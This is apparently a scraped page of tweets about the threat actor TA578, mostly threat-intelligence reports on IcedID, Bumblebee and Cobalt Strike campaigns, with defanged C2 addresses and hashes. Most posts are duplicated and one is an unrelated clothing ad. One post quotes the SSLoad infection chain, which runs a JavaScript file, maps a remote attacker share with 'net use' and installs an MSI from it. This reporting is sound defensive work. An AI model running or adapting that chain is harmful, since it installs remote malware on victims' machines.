Germán Fernández(@1ZRR4H) 's Twitter Profile Photo

Basically, TA578 was generating the .LNKs from a file named 1.bat in the 'test link' folder on the lamar desktop 👀

You can see the matches (metadata) here:
248322abe291aa979c34ee5f9bd76e70→IcedID
e1529e1c4bdcf9f34af8faa73f756422→Bumble
Same MAC and NetBIOS name too.

Basically, TA578 was generating the .LNKs from a file named 1.bat in the 'test link' folder on the lamar desktop 👀

You can see the matches (metadata) here:
248322abe291aa979c34ee5f9bd76e70→IcedID
e1529e1c4bdcf9f34af8faa73f756422→Bumble
Same MAC and NetBIOS name too.
account_circle
Germán Fernández(@1ZRR4H) 's Twitter Profile Photo

Inspired by and for further research, I've created my own 'malicious' .LNK file generator (without metadata), now it's time to test the capacities of this thing 🤓

account_circle
Unit 42(@Unit42_Intel) 's Twitter Profile Photo

2022-06-28 (Tuesday) - thread-hijacked email pushed ( ) - Led to on 91.238.50[.]80:8080, then on 217.79.243[.]147:8080 using bcnupdate[.]com and on 194.37.97[.]139:8080 using solvesalesoft[.]com - IOCs at: bit.ly/3u5fcRi

2022-06-28 (Tuesday) - #TA578 thread-hijacked email pushed #IcedID (#Bokbot) - Led to #DarkVNC on 91.238.50[.]80:8080, then #CobaltStrike on 217.79.243[.]147:8080 using bcnupdate[.]com and on 194.37.97[.]139:8080 using solvesalesoft[.]com - IOCs at: bit.ly/3u5fcRi
account_circle
Unit 42(@Unit42_Intel) 's Twitter Profile Photo

2022-06-14 (Tuesday) - malware infection led to activity on 172.93.181[.]105:443 using hocavopeh[.]com - IOCs available at:
bit.ly/3HoonBO

2022-06-14 (Tuesday) - #TA578 #Bumblebee malware infection led to #CobaltStrike activity on 172.93.181[.]105:443 using hocavopeh[.]com - IOCs available at:
bit.ly/3HoonBO
account_circle
Unit 42(@Unit42_Intel) 's Twitter Profile Photo

2022-07-06 (Wed) - campaign used Yandex URL to deliver zip-ed ISO - Led to ( ), which led to on 188.40.246[.]37:8080 & on 198.44.132[.]80:8080 using centertechengineering[.]com - IoCs available at: bit.ly/3nK8FYB

2022-07-06 (Wed) - #TA578 #ContactForms campaign used Yandex URL to deliver zip-ed ISO - Led to #IcedID (#Bokbot), which led to #DarkVNC on 188.40.246[.]37:8080 & #CobaltStrike on 198.44.132[.]80:8080 using centertechengineering[.]com - IoCs available at: bit.ly/3nK8FYB
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- - url > .js > smb > .msi

wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js

net use A: \\krd6.]com@80\share\ /persistent:no

msiexec.exe /I avp.msi

msiexec.exe /V

(1/3) 👇

IOC's
github.com/pr0xylife/SSLo…

#SSLoad - #TA578 - url > .js > smb > .msi 

wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js

net use A: \\krd6.]com@80\share\ /persistent:no

msiexec.exe /I avp.msi

msiexec.exe /V

(1/3) 👇

IOC's
github.com/pr0xylife/SSLo…
account_circle
V2 Systems(@v2systems) 's Twitter Profile Photo

This new campaign uses actual conversation threads taken from the sender and receiver's emails to trick either of them into opening a malicious file.


ow.ly/Z6N650JRLXU

This new #malware campaign uses actual conversation threads taken from the sender and receiver's emails to trick either of them into opening a malicious file.

#Phishing #Cybersecurity #TA578
ow.ly/Z6N650JRLXU
account_circle
Autumn Good(@autumn_good_35) 's Twitter Profile Photo

Bumblebeeも返信型でパスワードzipに対応

TA578 using thread-hijacked emails to push ISO files for Bumblebee malware
isc.sans.edu/diary/28636

Bumblebeeも返信型でパスワードzipに対応

TA578 using thread-hijacked emails to push ISO files for Bumblebee malware
isc.sans.edu/diary/28636
account_circle
Chris Pardue(@cpardue09) 's Twitter Profile Photo

-s :malware_traffic: RT Unit 42: 2022-07-06 (Wed) - campaign used Yandex URL to deliver zip-ed ISO - Led to ( ), which led to on 188.40.246[.]37:8080 & on 198.44.132[.]80:8080 using cent…

#ln -s :malware_traffic: RT @Unit42_Intel: 2022-07-06 (Wed) - #TA578 #ContactForms campaign used Yandex URL to deliver zip-ed ISO - Led to #IcedID (#Bokbot), which led to #DarkVNC on 188.40.246[.]37:8080 & #CobaltStrike on 198.44.132[.]80:8080 using cent…
account_circle
Vault Security 🍃(@VaulterVS) 's Twitter Profile Photo

Thread hijacking operation linked to TA578. Gun owner data leaked by California Justice Department.

darik.news/california/the…

Thread hijacking operation linked to TA578. Gun owner data leaked by California Justice Department.

darik.news/california/the… #DataLeak #hijacking
account_circle
Solo 24 Jam(@Solo24Jam) 's Twitter Profile Photo

via @JKafria_Shop: TA578 • Blouse Charlize • Spandex • Fit to L • 52.000 @FreeIklanID pic.twitter.com/WBzc28h24a

account_circle
Germán Fernández(@1ZRR4H) 's Twitter Profile Photo

3/ La primera etapa simula ser un sitio de Google Docs para realizar la descarga vía HTML5 y FileSaver.js (al estilo ).

Todo esto a través de la explotación dinámica de Cross-Site Scripting (XSS) en múltiples sitios de terceros (evasión).

3/ La primera etapa simula ser un sitio de @googledocs para realizar la descarga vía HTML5 y FileSaver.js (al estilo #TA578).

Todo esto a través de la explotación dinámica de Cross-Site Scripting (XSS) en múltiples sitios de terceros (evasión).
account_circle